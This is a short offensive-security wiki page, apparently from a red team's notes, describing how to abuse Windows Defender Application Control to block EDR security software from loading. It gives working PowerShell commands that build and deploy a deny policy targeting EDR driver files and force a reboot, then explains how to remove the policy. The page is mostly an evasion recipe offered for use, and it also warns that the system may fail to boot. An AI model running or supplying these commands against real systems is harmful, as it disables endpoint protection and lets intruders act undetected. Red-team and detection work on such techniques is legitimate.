---
title: Abusing WDAC to kill EDR
owner: Alexei Doudkine
last_reviewed_on: 2025-01-24
---

Straight away, a few things to keep in mind:

- This WILL require a reboot of the system.
- You need admin privileges.
- There's a chance the system won't boot - aka you Crowdstruck yourself.

Windows Defender Application Control (WDAC) is an application allow-listing agent built into Windows. It's normally meant to block untrusted applications from running. I don't know about you, but I don't trust EDR at all, so let's block it!

## Applying the Block

Let's start with a known good template (this one is from MS, actually):

[AllowAll.xml](/assets/doc/AllowAll.xml)

If you want to deep dive into the config format, [here's the Microsoft article](https://learn.microsoft.com/en-us/windows/security/application-security/application-control/app-control-for-business/design/select-types-of-rules-to-create).

This base policy is simply allowing everything to run. We need to start here since WDAC is "deny by default".

Then, in PowerShell:

```
$DenyRules = New-CIPolicyRule -Level FilePath -DriverFiles 'C:\Program Files\{EDR}\*' -Deny -UserWritablePaths
# $DenyRules += New-CIPolicyRule -Level FilePath -DriverFiles 'C:\Program Files\{Another_EDR}\*' -Deny -UserWritablePaths
Merge-CIPolicy -PolicyPaths .\AllowAll.xml -OutputFilePath .\BlockEDR.xml -Rules $DenyRules
```

In the first line, we replace `{EDR}` with the actual path to the EDR's folder. Note the wildcard `*` is needed at the end. We can keep adding rules to our `$DenyRules` variable if there are multiple EDRs or security bloat. And yes, you can use WDAC to block other allowlisting software 😛.

The last line will merge our new rules with the base policy and create a new policy, *BlockEDR.xml*.

Finally, we deploy the policy and reboot!

```
Set-CIPolicyIdInfo -FilePath .\BlockEDR.xml -ResetPolicyID; ConvertFrom-CIPolicy .\BlockEDR.xml .\BlockEDR.cip; CiTool.exe --update-policy .\BlockEDR.cip
shutdown.exe /t 0 /r
```

## Removing the Block

Once you're finished, you can delete this policy using *CiTool.exe*. First, find the Policy ID:

```
CiTool.exe --list-policies
```

Then remove the policy providing the GUID surrounded by `{}`. E.g.

```
CiTool.exe --remove-policy "{1939ed82-bfd5-4d32-b58e-d31d3c49715b}"
```

## Resources

- This tweet: <https://x.com/0x64616e/status/1822041831573479479>
- WDAC Wizard (GUI to mess with the policy xml): <https://webapp-wdac-wizard.azurewebsites.net/>
- Official docs: <https://learn.microsoft.com/en-us/windows/security/application-security/application-control/app-control-for-business/>